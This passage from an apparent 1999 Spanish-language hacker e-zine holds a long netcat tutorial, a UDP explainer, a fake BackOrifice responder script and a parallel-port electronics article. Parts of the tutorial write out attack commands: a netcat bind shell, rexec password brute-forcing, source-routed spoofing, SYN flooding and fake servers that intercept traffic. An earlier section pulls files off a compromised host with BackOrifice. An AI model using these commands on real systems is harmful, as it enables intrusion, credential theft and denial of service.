colocarlo en c:\ (o donde sea). 1b) Desde ms-dos: nc -v -l -p 3333 > archivo Para recibir un archivo del host remoto 2b) Desde BackOrifice: tcpsend c:\archivo xxx.xxx.xxx.xxx:3333 Para conectarse al puerto 3333 de nuestro sistema, y enviarnos el archivo especificado. FIN: Aunque en teoria esto debe funcionar pueden haber problemas con este metodo al usar netcat para windows. La razon es que la version para windows no sirve del todo bien al ser ejecutado bajo Win95/98, en particular la funcion que le permite abrir puertos de conexion. Ademas, la version de Windows no cerrara la conexion una vez terminada la transferencia de datos; habra que dar Ctrl-C. En otras palabras, este metodo es seguro solamente en NT y Unix. ----- D) Sobrellevado por el deseo de reclutar mas CPUs para subir mi nivel en el proyecto RC5-64, me di cuenta de que sin lugar a dudas existen otras personas que andan rastreando la red, como yo, buscando victimas. Pero con seguridad su objetivo es simplemente chingar. Entonces decidi hacer un shell script para linux, muy sencillon, que simulara el servidor BackOrifice. Antes que nada, usando netcat (nuevamente) consegui la representacion en ASCII de los datos que envia el cliente BO para detectar servidores, y de los datos con los que responde el servidor (en este caso mi propia computadora) al ser detectado. El cliente, al escanear, la siguiente hilera de datos al subnet. c8uKT2X Lo cual es el equivalente del comando "ping", pero a todo un subnet, no a una sola maquina. El servidor, que en este caso mi propia maquina (llamada 0P71K-5), responderia con un "pong" asi: cuKTxƙeQuQ*?T%+- Que significa todo eso? Observar que los primeros 19 bytes enviados son esencialmente iguales. Estos forman el "header" que encabeza los datos enviados y recibidos entre cliente y servidor. Los siguientes bytes son la informacion que le sigue al header. En este caso llevan la informacion !PONG!1.20!0P71K-5! En este caso, los 21 bytes restantes son el tipo de respuesta (pong), la version del servidor (1.20) y el nombre de la maquina (0P71K-5). ** 1:Ping host packet sent (19 bytes) val1: '' val2: '' ---------- Packet received from host 127.0.0.1 port 31337 --------- !PONG!1.20!0P71K-5! ------------------------- End of Data ------------------- Si respondieramos solamente con los 19 bytes originales, nuestro falso servidor responderia, pero sin presentar ningun tipo de datos. ** 1:Ping host packet sent (19 bytes) val1: '' val2: '' ---------- Packet received from host 127.0.0.1 port 31337 --------- ------------------------- End of Data ------------------- Claro que el servidor puede hacer mucho mas que solamente mandar "pongs", pero esto ilustra que es posible responder a un cliente BO con informacion falsa con facilidad. Aqui esta el shell script. Su unico requerimiento es netcat. Es muy chafa puesto que solamente responde con "pong" y el nombre de mi maquina. Pero es posible hacerlo responder de otras maneras, o cambiando el nombre de la maquina por algo que le recuerde lo lame-ass que es, o algo. ---Corta Aqui--- #!/bin/sh # BOBuster # Programa analogo al netbuster. # Se me acaba de ocurrir, y no tengo mucho tiempo para hacerlo mas chido, # pero funciona. # # Archivos utilizados: log.bob y pong.bob # tail -1 pong.bob | nc -u -v -l -p 31337 >> log.bob 2>&1 echo "Fecha de conexion: " >> log.bob date >> log.bob echo >> log.bob ---Corta Aqui--- # pong.bob # Contiene los datos que se transmitiran al cliente BO que se haya # conectado. # Por ahora solamente respondera con un "pong" y el nombre de la maquina. # # En este archivo no deben haber espacios despues de la ultima linea! cuKTxƙeQuQ*?T%+- ---Corta Aqui--- # log.bob # Contiene los datos de quien se haya conectado. # Asi que esta vacio por ahora ;) # ---Corta Aqui--- Instalacion sencilla: Despues de haber creado los archivos, y ponerlos en el directorio deseado, asegurarse de hacer un chmod 744 BOBuster. Notas Finales Por razones de tiempo no he podido mejorar este script. Y la mayor desventaja que tiene es que una vez recibido la informacion del cliente, y respondido con los datos que contiene el archivo pong.bob, no podra volver a responder a lo que reciba del cliente. Es decir, una vez enviado el "pong", se acabo la vida util del programa. Habra que cerrarlo con Ctrl-C y volver a correrlo de nuevo. Ademas, contrario a TCP, las conexiones UDP se mantienen indefinidamente. Entonces hay que cerrar el programa con Ctrl-C, una vez hecha la transferencia de datos. Si se corre el programa en el fondo,hay que darle kill a netcat directamente. He pensado en algunos arreglos que podrian hacerse, y espero darlos a conocer en el siguiente articulo, sin tanto pretexto, y junto con una version mas estable de BOBuster. May the force be with you! http://www.jerky.net/~xnahualx nahual@sdf.lonestar.org >< >< U S E R D A T A G R A M P R O T O C O L Yo_Soy Bueno , en este documento voy a tratar de explicar brevemente de que trata este protocolo , siguiendo con la serie de textos publicados de la familia TCP/IP, ( es necesario tener algunos conocimientos basicos de TCP/IP para entender este articulo ). UDP o User Datagram Protocol es un protocolo de la familia TCP/IP, como sabemos los protocolos TCP/IP estan divididos en un conjunto de capas, UDP se encuentra en la capa de transporte. UDP es el protocolo alternativo en esta capa de transporte, siendo un protocolo de datagrama menor. Los datagramas son grupos de informacion transmitidas como unidades a y desde la capa superior de la familia TCP/IP. El protocolo provee una aplicacion para enviar mensajes de un programa a otro , aun asi nada nos asegura que los paquetes llegaran al destino, pues los paquetes pueden perderse sin que nos sea indicado un error en la trasmision. Las aplicaciones que requieran esto deberian usar TCP. < 32 Bits > 0 7 8 15 16 23 24 31 ++Ŀ Puerto Puerto de Fuente destino Ĵ Longitud Checksum Ĵ Datos Formato de las cabeceras El puerto de la fuente es un campo opcional , indica el puerto que envia los procesos y debe asumirse que sera a este puerto al cual sera enviado el mensaje de respuesta. Si no es usado el valor cero es insertado en este campo. El puerto de destino es el puerto de la direccion a la cual seran enviados los datos. La longitud es la longitud en octets de este datagrama incluyendo la cabecera y los datos, teniendo un minimo valor de 8 octets. El checksum es el completemto de 16bits de el complemento de la suma de la seudocabecera de informacion de la cabecera IP , la cabecera UDP y los datos , rellenados son cero octets al final si es necesario para hacer dos octets multiples . Si el checksum contiene un valor valido o cero, un mensaje de aplicacion es enviado a la aplicacion inicial, si esto no fuera asi el datagrama UDP es ignorado . Este procedimiento es similar al usado en TCP y sirve para comprobar que los datos recibidos estan en condiciones que los datos enviados. La seudo cabecera se antepone a la cabecera UDP y contiene la direccion fuente, la direccion destino, el protocolo y la longitud UDP. Esta informacion da una proteccion contra los datagramas mal ruteados. 0 7 8 15 16 23 24 31 +++Ŀ direccion fuente Ĵ direccion de destino Ĵ cero protocolo longitud UDP Las aplicaciones del protocolo son variadas , desde aplicaciones multimedia , como Internet Phone, y conferencias de audio y video en tiempo real ( www.real.com ) , hasta otras aplicaciones de red como en Network File System ( NFS ) , Simple Network Management Protocol ( SNMP ) y Trivial File Transfer Protocol ( TFTP ). Yo_Soy Raza Mexicana Team 1999 >< >< ----------- NETCAT 1.10 ----------- Herramienta de Diagnostico y Exploracion de Redes Articulo por: Nahual http://www.Raza-Mexicana.org Mon May 17 14:44:33 UCT 1999 926952273 UTC --------------------- INDICE 1.Introduccion 2.Uso General 3.Usos Especificos 4.Guia Rapida 5.Nota Final INTRODUCCION Netcat en una herramienta para Unix que lee y escribe informacion entre conexiones de red, usando los protocolos TCP y UDP. Fue escrita por Hobbit, originalmente para sistemas Unix, Berkeley y System V. Weld Pond, de l0pht Heavy Ind. escribio despues Netcat 1.1NT para Guindows NT, la cual funciona casi perfectamente en Win 95/98, excepto que las conexiones que reciba no seran estables. Netcat es una herramienta de diagnostico y exploracion de redes. Puede crear casi cualquier tipo de conexion y tiene varias opciones integradas. Puede ser utilizado solo, como soporte para otros programas, o puede incluirse dentro de scripts SH (en Unix) o batch (en ms-dos). Habilidades basicas de Netcat: -Conexiones al exterior o del exterior, usando UDP o TCP, hacia o desde cualquier puerto -Verificacion de DNS normal o en reversa, con las advertencias correspondientes -Uso de cualquier puerto local -Uso de cualquier direccion a la que se tenga acceso en la red local -Habilidad de rastrear puertos, incluso de manera aleatoria -Capacidad de decidir que camino tomaran los paquetes de enviados, a modo de "encaminarlos" (source-routing) -Puede procesar comandos de programas, de scripts, y del usuario. -Capaz de enviar datos en modo de transmision lenta,una linea cada N segs -Monitoreo y presentacion, en modo hexadecimal, de datos transmitidos y recibidos -Capacidad de dejar que otro programa maneje conexiones ya establecidas -Opcionalmente responde a opciones caracteristicas de telnet -Creacion de nuevas herramientas, basandonos en los servicios de Netcat. Nota: Esta guia fue escrita principalmente para usuarios/administradores de sistemas Unix. La version de Windoze no es tan flexible por el CLI tan debil que tiene ese sistema operativo. USO GENERAL El programa en si se llama "nc". Su forma mas sencilla, "nc servidor puerto" establece una conexion TCP al puerto especificado,con el servidor especificado Lo que se le introduzca a Netcat via standard input va a ser dirigido al servidor, y lo que reciba Netcat como respuesta sera dirigido a nosotros via standard output. Es decir, Netcat va a seguir mandando datos que le introduzcamos, y recibiendo datos de otro lado de la conexion hasta que el otro lado cierre la conexion. Netcat tambien puede funcionar como servidor. Escuchando intentos de conexion a los puertos que elijamos, y haciendo el mismo proceso de entrada y salida de datos. Se puede decir que a Netcat funciona de la misma forma en modo de servidor o modo de cliente, seguira transmitiendo y recibiendo datos hasta que ya no haya mas. En ambos modos, puede forzarse la desconexion al configurarse cierto tiempo de inactividad del otro lado. Esto lo puede hacer tambien via UDP, asi que Netcat puede considerarse un programa parecido a telnet que puede usarse para diagnosticar servidores que funcionen en modo UDP. Claro que no se puede confiar en conexiones UDP como con las que utulicen TCP, ciertos sistemas pueden tener problemas al transmitir cantidades grandes de datos,pero no deja de ser util esta capacidad El uso de Netcat tiene sus ventajas sobre el uso de telnet al conectarse a puertos arbitrarios. Telnet cierra la conexion cuando el usuario o algun programa parece tomar control mediante la introduccion de datos. Esto es evidente en scripts, donde se necesita calcular un tiempo de espera para evitar que telnet interrupta la salida de datos. Esta es la razon principal por la cual Netcat sigue activo hasta que el otro lado cierre la conexion. Telnet tampoco transimita informacion binaria arbitraria, porque ciertos caracteres son interpretados como opciones de telnet, y seran removidas de la corriente de datos. Telnet tambien transmite ciertos mensajes de diagnostico que presenta en la pantalla junto con el resto de los datos; Netcat jamas metera sus propios mensajes junto con los datos transmitidos. No modificara la corriente de datos de ninguna manera, a menos que se le indique lo contrario. Telnet no puede esperar conexiones del exterior, ni tampoco usar UDP en lugar de TCP. Netcat no tiene estas limitaciones, es mas chico y veloz, y tiene muchas mas ventajas. Netcat es simple y flexible. Hobbit lo describe como la navaja suiza de la internet, se pueden hacer una gran cantidad de cosas con el, siendo la imaginacion el unico limite, tal vez. Si no se le da ningun argumento, Netcat los pedira, leera lo que se le de, y los separara internamente. Esto es util con ciertos tipos de scripts, y su efecto secundario es que no se podran ver los procesos que corra, con el comando ps. El argumento host puede ser la version alfanumerica o el IP numerico. Si la opcion -n es especificada, Netcat solo aceptara IP numericos, y no verificara el DNS por ningun motivo. Si el argumento -n no es especificado, pero -v si lo esta, Netcat hara una verificacion normal y en reversa del host, y dara una advertencia si el IP y el nombre no coinciden. Esto toma un poco mas tiempo, pero puede ser util. Aunque en ocasiones acelera la conexion cuando queremos saber el nombre de un IP y tambien conectarnos ahi. Si no se usa la -v, Netcat hara lo que tenga que hacer silenciosamente, a menos que ocurra algun error. En este respecto, una conexion rechazada no es considerada un error, a menos que se haya especificado un solo puerto. El argumento -w indica a Netcat que debera esperar un tiempo determinado de inactividad antes de cancelar la conexion. Por ejemplo, -w 3 hara que Netcat espere 3 segundos antes de intentar conexion con en otro puerto (o cancelar la operacion completamente). De hecho, esperara el numero de segundos especificados y si no recibe nada esperara nuevamente el mismo tiempo, por si las dudas, y entonces si cerrara la conexion. De esta manera, Netcat trabaja con las conexiones sin nuestra intervencion, cerrandolas cuando el servidor al que nos conectemos deje de responder. Si usamos el argumento -u, Netcat abrira conexiones con UDP en lugar de TCP. Aunque UDP es un protocolo sin conexion estrictamente hablando, Netcat manejara estas pseudo-conexciones como autenticas conexiones UDP para compatibilidad con el kernel del sistema operativo. Aunque Netcat indicacara que una conexion UDP se haya establecido inmediatamente (y de hecho siempre lo hace con cualquier tipo de conexion), ninguna clase de datos seran enviados hasta que le introdujamos algo via standard input. Solo entonces podremos saber si hay un servidor UDP del otro lado. Y aun asi puede no responder, y lo que hay que hacer es esperar la respuesta un tiempo determinado, y rezarle al dios de su preferencia. Sacaran mas provecho de las 'conexiones' UDP si el standard input a Netcat se asemeje a datos que soliciten servicios al servidor. Para ver los datos enviados y recibidos, en modo hexadecimal, debe usarse el argumento -o , e indicar un archivo que contendra estos datos. Es decir, -o archivo_de_datos En este archivo pueden observarse los simbolos ">" y "<" al principio de cada linea. ">" indica datos que fueron enviados por nosotros y "<" indica los que fueron recibidos. Cada linea contiene representaciones hexadecimal y ascii de los datos enviados y recibidos. El uso de esta opcion no es recomendable en caso de que la velocidad sea un factor critico, puesto que esto hace un poco mas lento el proceso. Netcat puede utilizar cualquier puerto local para la transmision de datos, siempre y cuando no este en uso o el acceso a ese puerto sea restringido. Esto se logra con el argumento -p numero_de_puerto. Si se es administrador del sistema, puede usarse cualquier puerto restringido, es decir < 1024. Si no se especifica un puerto desde donde conectarnos, se usara cualquiera que asigne el sistema; esto es a menos que se especifique el argumento -r en lugar de -p , lo que indicaria que se usen puertos locales al azar (e incluso puertos remotos al azar). Tambien puede usarse cualquier IP de nuestra red local, si es que pertenece a un dispositivo (computadora o lo que sea) servido por nuestra maquina. Esto no funciona bien en algunas plataformas. En modo de servidor, Netcat esperara intentos de conexion del exterior. Para entrar en este modo se usa el argumento -l, y opcionalmente se especificara un puerto local al que puedan conectarse del exterior. En modo UDP forzosamente hay que especificar este puerto, mientras que en modo TCP podemos dejar que el sistema asigne el puerto local, y si tenemos el argumento -v nos dira que puerto eligio para nosotros (Claro que la mayoria de las veces seguramente vamos a querer especificar el puerto nosotros mismos) Inclusive podemos agregar el argumento host remoto y, opcionalmente,el puerto fuente remoto. Asi Netcat solo aceptara conexiones provenientes de ese host y, opcionalmente, de ese puerto. De cualquier manera, si agregamos el argumento -v Netcat nos informara de la conexion establecida, de que que host es, y de que puerto remoto se esta conectando. Si Netcat fue compilado con -DGAPING_SECURITY_HOLE, el argumento -e especificara el programa a ejecutar una vez hecha o recibida una conexion. En modo de servidor, funciona como inetd, pero para una sola conexion. Funciona con TCP y UDP. El argumento -e solo puede ir seguido de el nombre de un programa sin argumentos. Para eso se puede escribir un script aparte, que corra dicho programa con los argumentos necesarios, o usar inetd de plano. Por razones de seguridad no esta habilitado, por default. Como administradores de sistema, en especial, no deberan dejar un puerto abierto que otorgue acceso a una shell! Si Netcat fue compilado con -DTELNET, el argumento -t le da la capacidad de conectarse a telnetd y pasar por encima de negociaciones preliminares y recibir el "prompt login:" directamente. Como esto podria hacer cambios a la corriente de datos, no esta habilitado por default. Como nota adicional, estas dos ultimas opciones se logran agregando lo siguiente a la seccion PREDEFINES del Makefile: DFLAGS= -DGAPING_SECURITY_HOLE -DTELNET Datos durante la conexion son dirigidos hacia el standard output, leyendo y escribiendo trozos de 8K.Datos introducidos via standard input son procesados de la misma forma, pero con el argumento -i se pueden introducir los datos en intervalos de tiempo definidos, haciendo el proceso algo mas lento. Esto lo hace mandando secciones de 8K linea por linea. Sin embargo, si el standard input viene de nosotros, estos datos de por si los estamos mandando linea por linea. Entonces el argumento -i es mas bien aprovechado cuando Netcat esta funcionando junto con archivos de datos o programas, y queremos cuantificar los datos que enviemos. El rastreo de puertos (port scanning/probing) es una forma de ver lo que hay al alcance. El puerto o puertos son definidos despues del host. Para rastrear un rango de puertos se separan el primer puerto y el ultimo con un guion. Ejemplos: Rastrear los puertos 20 hasta el 110: nc -v -w 3 -z localhost 21-110 nc -v -w 3 -z localhost ftp-pop3 Este ultimo ejemplo no funcionara con aquellos puertos que tengan un guion incluido en su nombre, como netbios-ssn. Netcat 1.10 no puede interpretar correctamente un rango como "ftp-netbios-ssn"; el rango tendra que ser definido numericamente, "20-139". El argumento -z, por cierto, indica a Netcat que haga un rastreo rapido de puertos abiertos, sin mandar informacion a las conexiones TCP, y muy poca informacion a las conexiones UDP. Aqui podria usarse el argumento -i para poner un intervalo de tiempo entre puerto y puerto. Por cierto, el argumento -z no es un halfscan. El rastreo va a ser grabado en los logs. Esto es porque Netcat no fue hecho especificamente para rastreo de puertos, para eso existen otras herramientas que tienen a su disposicion personas que quieran analizar su sistema, o el de otros. El argumento -r indica a Netcat que haga un rastreo de puertos al azar, y al mismo tiempo utilizara nuestros puertos locales al azar. Asi es menos obvio el rastreo. Al usar el argumento -p, el puerto local siempre sera el mismo. Nuevamente, si se agrega el argumento -i el rastreo es menos obvio porque no es tan "insistente", aunque tarde mas. Por lo tanto, los administradores de sistema debemos prestar aun mas atencion a lo que nos presentan los logs. Es posible tambien usar el argumento -g para enviar paquetes por un camino predeterminado (source-routing). Se puede usar hasta 8 veces para construir el camino que seguira la informacion. Ejemplo: nc -v -w 3 -g gateway1.net -g gateway2.net objetivo.principal.net 23 El argumento -G (mayuscula) es un indicador que sirve para ajustar el camino que recorreran los paquetes de informacion enviados. Los valores para este argumento deberan ser multiplos de 4 (4,8,16...). Hay que tener en cuenta que muchas redes no aceptan datos "encaminados" de esta manera. Pero es util para probar si nuestra red es vulnerable. Ademas, Linux no tiene soporte para source-routing por ahora (el kernel que use yo al escribir este documento es version 2.2.6) Netcat actua de manera muy similar al comando cat, en Unix. Lee el standard input de la misma manera, y podemos cerrar la conexion con ^C. Datos binarios o ASCII pueden transmitirse mediante "piping" desde algun programa,leyendolos desde algun archivo. Por ejemplo, cat archivo | nc -v -w 3 destino.com 12345 o nc -v -w 3 destino.com 12345 < archivo USOS ESPECIFICOS Estos son solo algunos ejemplos para realizar cosas comunes. Sin embargo, pueden servir para darle ideas a la mente creativa.Manejar Netcat con scripts SH (o la Shell que usen) es una manera facil de hacer cosas mas complejas. Netcat es una herramienta que puede usarse para bien o para mal. Asi como una navaja suiza puede servir para reparar y construir, o atacar y destruir. Los administradores de sistema encontraran que es una herramienta muy util para que alguien, con conocimiento intermedio de redes, escriba hacks rapidos que puedan atacar puntos debiles en su sistema. 1.Acceso a la WWW nc -v www.raza-mexicana.org 80 Y al hacerse la conexion, GET /nahual/documento.html 2.Acceso a la WWW via el script 'scripts/web' web www.raza-mexicana.org El puerto default es 80.Un nos lleva al archivo default, /index.html. Para abrir otros archivos, se da el nombre del archivo. Ejemplo: /nahual/documento.html Comandos disponibles (sin comillas): Para subir de directorio, conservando el nombre del archivo, ".." Para guardar un archivo, "SAVE" Para cambiar de host, "HOST" Para cambiar de puerto "PORT" Nota: En los puntos (1) y (2) veremos los tags HTML. Esto es porque Netcat no interpreta el codigo, lo presenta como codigo fuente HTML, tal como es. 3.Acceso a servicios en diversos puertos (telnetd, ftpd, etc.) Hacer conexion via sendmail, por ejemplo: nc -v maquina1.shell.net 25 Al terminar de hacer uso de sendmail, o lo que esten usando, solamente hay que dar un ^C para cerrar la conexion. 4.Rastreo de puertos activo echo quit | nc -v -w 3 maquina1.shell.net 20-250 500-600 4000 6667-7000 > archivo.txt 2>&1 El standard output de echo, "quit", va a ser el standard input de Netcat. Asi es posible hacer la conexion, y salirse automaticamente, obteniendo asi mas informacion sobre el servicio que ofrecen los puertos abiertos. Evitar acceso al puerto 19 (chargen), por supuesto. Todo sera grabado en archivo.txt. Incluyendo mensajes de error (2>&1) Recordar que standard error no necesariamente son errores, pueden ser avisos del kernel, como la existencia de puertos abiertos. 5.Rastreo de puertos pasivo nc -v -w 2 -z maquina1.shell.net 20-250 500-600 400 6667-7000 > archivo.txt 2>&1 Nos informara sobre servicios abiertos, pero sin intentar acceso al sistema. Nuevamente, no es un halfscan. Podemos ver la conexion grabada en los logs del sistema. 6.Transmision/Recepcion de datos Directorios archivados: Preparar el receptor nc -l -p 31337 | uncompress -c | tar xvfp - Activar el transmisor tar cfp algun/directorio | compress -c | nc -w 3 destino.com 31337 Archivos: Preparar el receptor nc -l -p 12345 | uncompress -c > archivo.xxx Activar el transmisor compress -c archivo.xxx | nc -w 3 destino.com 12345 Nota: Obviamente compress y uncompress pueden ser reemplazados por gzip y gunzip respectivamente. 7.Recepcion de datos via browser Preparar el receptor nc -l -p 20034 /dev/null Y lo bombardeamos de ida y regreso yes 09876543210987654321 | nc maquina1.shell.net > /dev/null El programa data/data.c puede generar datos aleatorios, utiles para probar la estabilidad del servicio que estemos probando. 13.Analisis de protocolos. A falta de acceso a herramientas especializadas, puede hacerse analizando los datos transmitidos con el argumento -o. El administrador de sistema, o un atacante con acceso a una root shell, puede usar esto como si fuera un sniffer. Ver el punto (21). 14.Simulacion de clientes de servicios remotos (rservices), ayudado con el programa data/rservice.c, o con rsh y rlogin. De esta manera es posible ver si hay hosts remotos inseguros en .rhosts rservice usuario password | nc -v -w 2 -p 1023 maquina1.shell.net 23 15.Verificar el funcionamiento de las alertas de sistema (syslog). Si /etc/syslog.conf es configurado de cierta forma, el siguiente ejemplo podria mandar una alerta a las terminales de todos los usuarios. echo '<0>cualquier_mensaje' | nc -v -w 2 localhost 514 Recordar que 514 es el puerto syslog 16.Verificar que nuestro sistema bloquea paquetes "encaminados" (source-routed) y que son correctamente filtradas conexiones TCP y UDP a puertos normalmente protegidos del exterior, probando con diferentes puertos y hosts. 17.Bloqueo de conexiones a puertos especificados. Los servidores de Xwindow, por aceptar conexiones de pualquier puerto, son muy vulnerables. Netcat puede ligarse al puerto 6000 del X server y cerrar cualquier intento de conexion, y/o grabar ese intento. # Este script recibe conexiones al puerto default del X server # en este caso provenientes de nuestra maquina, puerto 2, para despues # cerrarla. Facilmente pueden agregarsele opciones para # hacerlo mas flexible y potente. while true ; do nc -v -l -p 6000 localhost 2 done 18.En caso de que scripts CGI no sean permitidos en su web server, se puede abrir un puerto con Netcat, en localhost o en alguna otra maquina, y usarlo para correr programas que hagan lo que generalmente haria un script CGI, haciendo referencia a ese puerto en dicha maquina. 19.Abrir puertos que generalmente solo estarian abiertos en maquinas Winshit infectadas con caballos de troya como netbus, sockets de troie, etc. Cuando alguien intente hacer la conexion con el falso servidor troyano, se puede responder enviandole cantidades enormes de informacion inutil, o un algun ataque DoS, etc. 20.Es posible ligar puertos bajos como el 20 y conectarse a otras maquinas, asi evitando muchas veces filtros que esa maquina tenga. Por ejemplo, los servidores NFS muchas veces aceptan conexiones del exterior sin filtrarlas, cuando provienen de ciertos puertos. El administrador de sistema debe tener esto en cuenta. En sistemas Unix es necesario ser root para tomar puertos bajos (< 1024). En Windoze me parece que no hay ningun problema con tomar esos puertos. 21.Es posible ligar ciertos puertos y correr servidores falsos, a los cuales los usuarios podrian conectarse y asi es posible interceptar informacion, estilo sniffer. Toda informacion que pase por el falso servidor puede ser grabada mendiante el argumento -o Por la existencia de esta posibilidad, es recomendable lo siguiente: 1.Utilizar SSH para conectarse a los servicios de un sistema (en lugar de telnet) 2.Utilizar PGP para enviar informacion desde dicho sistema 22.Usar Netcat con los argumentos -l y -e es util para tener acceso a una shell (Unix o ms-dos). Si se usa UDP la conexion permanece abierta indefinidamente, y solo dejara entrar aquellos con nuestro IP. Escuchar la conexion desde un puerto y host especificos hace dificil que alguien mas entre, si elegimos usar TCP. Sistema remoto nc -u -l -e /bin/sh -p 3333 Nuestro sistema nc -u -w 3 sistema.remoto.net 3333 Obviamente, la shell en Unix puede ser cualquiera de la familia C, o Bourne. La familia TCL (tclsh y wish) no funciona porque no son shells verdaderas, requieren cargarse bajo una shell autentica. En caso de maquinas NT, la shell es cmd.exe. En otros tipos de Winblows es command.com pero, como ya mencionaba, es posible que no de resultado abrir un puerto en Win 9X. 23.Ataque a sistemas por fuerza bruta, adivinando passwords, una vez obtenida la lista de usuarios. El siguiente ejemplo va a usar el programa rservice para meter un usuario, su clave de acceso, y un comando (en caso de que descubramos la clave) al puerto 512 (exec) de la maquina remota, via standard input a Netcat. rservice usuario password pwd | nc -v -w 3 maquina1.shell.net exec El comando pwd es el default, por lo tanto no es obligatorio ponerlo, pero es posible poner cualquier otro comando en su lugar. Es menos probable que se graben intentos fallidos de acceso en los logs atacando exec remoto (rexec) via el puerto 512,contrario a otros puertos mas "conocidos". Es una debilidad que muchos pueden aprovechar. Es posible atacar via login remoto (rlogin) por el puerto 513, pero es necesario ligarse a un puerto entre 512 y 1023, de lo contrario rlogind no permitira el acceso. Ataque al puerto 110 (pop3) es otra opcion, la cual aprovechan programas como el "hotmail hacker". El cracker que desee atacar un sistema, puede agregar un glosario o diccionario y una lista de usuarios con facilidad, y hacer cracking por fuerza bruta. Pero un sistema bien configurado y un administrador que sepa hacer su trabajo, con seguridad podra detectar este tipo de ataque (muy lento, por cierto). 24.Spoofing es cosa sencilla, dependiente solamente de que direcciones podemos usar para "encaminar" nuestros paquetes, de que maquinas acepten informacion recibida de esta manera. Solo es cosa de construir ese camino con los argumentos -g y, si es necesario, -G 25.SYN flooding contra algun servicio es facil de realizar utilizando el argumento -s con unos cuantos hosts falsos, 5 o mas es un buen numero. Consiste en enviar un paquete de sincronizacion (SYN) para pedir una conexion, el servidor respondera que ha recibido el paquete y esta listo para establecer la conexion (SYN ACK), el cliente debera responder (ACK), pero como el SYN flooder usa hosts falsos, el servidor nunca recibira el ACK, pero se quedara esperandolo por determinado tiempo, agotando recursos. En otras palabras, SYN flooding se basa en un "3-way handshaking" incompleto. El queue se llenara de pedidos de conexion y la memoria disponible caera rapido. El ataque, por lo general, solo deshabilitara el servicio siendo atacado, a menos que maquina siendo atacada tenga poca memoria disponible. Como administradores, notaremos este tipo de conexion incompleta con el comando netstat. Lo notaremos en estado SYN_RECV. Para disminuir este problema, causado con Netcat o cualquier otra herramienta, se puede aumentar el numero de conexiones incompletas permitidas por el kernel, disminuir el tiempo que esperara el servidor por un ACK (el default suele ser 3 a 5 minutos), o tal usar algun sistema de monitoreo de conexiones mande un paquete RST a las conexiones incompletas. GUIA RAPIDA Sintaxis: nc [-argumentos] [ host] [puerto | rango_de_puertos] Argumentos: (Todos son opcionales) -h Help - duh -n Numeric - solo acepta IP numerico Acelera el diagnostico -v Verbose - pone informacion adicional sobre la coneccion Recomendable usarlo siempre -vv Very Verbose - informacion mas detallada todavia No muy necesario, podria ser util en diagnostico de sistemas problematicos -w Wait - espera cierto tiempo a que se establezca la conexion Recomendable, -w 3 es una buena opcion -p Port - puerto local a utilizar -s Server - server local a utilizar No funciona en todas las plataformas -r Random - eleccion de puertos al azar (locales y remotos) -l Listen - escuchar por conexiones del exterior. Como inetd -e Execute - correr un programa al establecerse una conexion Util, pero inseguro si Netcat actua como servidor -t Telnet - Evita negociaciones iniciales con telnetd Util, pero puede reducir confiabilidad en la transmision de datos -z Zero I/O - Rastreo rapido de puertos, evitando salida o entrada de datos. -i segs Interval - Espera un intervalo de tiempo entre paquetes enviados -g gateway Gateway - Maquina que retransmitira nuestros datos a otra maquina o al destino final. -G Gateway Pointer - Es lo que indica que gateway esta en uso en determinado momento. En ocasiones es util mover este indicador nosotros mismos. Definido en multiplos de 4. ADVERTENCIA Ni Raza-Mexicana, ni sus miembros asumen responsabilidad por el uso de esta informacion. Cualquier mal uso se deja bajo responsabilidad del lector. Windoze, Winblows, y Winshit son marcas propiedad de Microscrap Corp. NT son las letras decimo cuarta y vigesimo primera del alfabeto castellano, respectivamente. Dedicado a quien lo este leyendo ahorita, espero que les sirva. Habran revisiones periodicas a este documento. Gracias a nauj y a kukulkan por ayudarme en la etapa de pruebas. Nahual >< >< # Manejo Del Puerto Paralelo. # Por Kukulkan # Continuacion.... En este articulo abordare la recepcion de datos por medio del puerto paralelo, y seran graficados, tambien propondre un proyecto de control, este sera de temperatura, pero cada quien podra adaptarlo segun su imaginacion (se prohibe utilizar drogas o cualquier alucinogeno en la elaboracion del proyecto =P ) #Recepcion de datos en el puerto paralelo. La recepcion de los datos sera de 8 bits, el circuito que utilizaremos es el ADC804, un convertidor analogico a digital, el cual tiene un precio en el mercado (por lo menos aqui en Guadalajara, Mexico alrededor de 40 pesos) El circuito es mostrado en la siguiente figura: Figura1 - index1.jpg En el puerto paralelo solo tenemos 4 entradas de datos, e introduciremos 8 bits, por lo tanto utilizaremos una tecnica denominada "multiplexeo" la cual consta de meter varios datos por un canal, es decir si tenemos 5 fuentes de seal y solo disponemos de un canal transmisor se multiplexean los 8 canales, es decir se muestrean los canales a una frecuencia Fo y se transmite un pedazo de cada seal por el canal, es como si tuvieramos un interruptor que toca a cada seal un determinado tiempo y en en el canal transmisor se encuentran las seales cortadas en pedazos iguales, y en el receptor se tienen 8 canales en los cuales se vacia cada seal con un multiplexor, este "interruptor" manda a cada canal la seal correspondiente sin mezclarlas, tal y como fueron generadas. En esta seccion utilizaremos un multiplexor de 2 a 1 de 4 canales, es decir por 4 canales entra el nibble menos significativi y por los otros 4 cabales el nibble mas significativo, asi introduciremos los 8 bits entregador por el ADC804, el multiplexeo sera por software. Figura2 - index2.jpg Las salidas 1Y, 2Y, 3Y, 4Y del 74157 (multiplexor) se conectan a los pines del puerto paralelo 11\,10,12,13. Como se aprecia, el pin 11 esta negado, pero la correcion se hace en el programa. Programa No.1 #include #include #include void main () { int d1,d2,d3,d4,d5,intr; float analogico; do { outportb (0x378,4); outportb (0x378,6); do intr=inportb(0x379)&8; while(intr==0); outport(0x378,2); d1=((inportb(0x379)&0xf0)^0x80)>>4; outportb(0x378,3); d2=((inportb(0x379)&0xf0)^0x80); d3=d1+d2; gotoxy (10,10); printf("%d" ,d3); gotoxy (20,20); analogico=d3*0.0196; printf("%f" ,analogico); } while(!kbhit()); } En las terminales Vref/2 se hace un divisor de tension el circuito se alimenta con 5 volts, y en la entrada Vin se coloca un potenciometro, resistencia variable, para ver los efectos de esta variacion, a continuacion se muestra el divisor de tension: Figura3 - index3.jpg A continuacion esta el programa que presenta graficamente la entrada del ADC: #include #include #include #include void main ( ) { int d1,d2,d3,x,y,control,intr; int modo=DETECT; initgraph(&modo,&control,"c:\\+c\\bgi"); x=11; setfillstyle(1,3); bar(10,10,300,267); do { outportb (0x378,4); outportb (0x378,6); do { intr=inportb (0x379) &8;} while (intr==0); outportb (0x378,2); d1=((inportb (0x379) &0xf0 )^ 0x80 )>>4; outportb (0x378,3); d2=(inportb (0x379) &0xf0 )^0x80; d3=d1|d2; y=266-d3; putpixel (x,y,6); x++; if (x==300) {bar(10,10,300,267); x=11; delay (300); } } while(!kbhit()); } 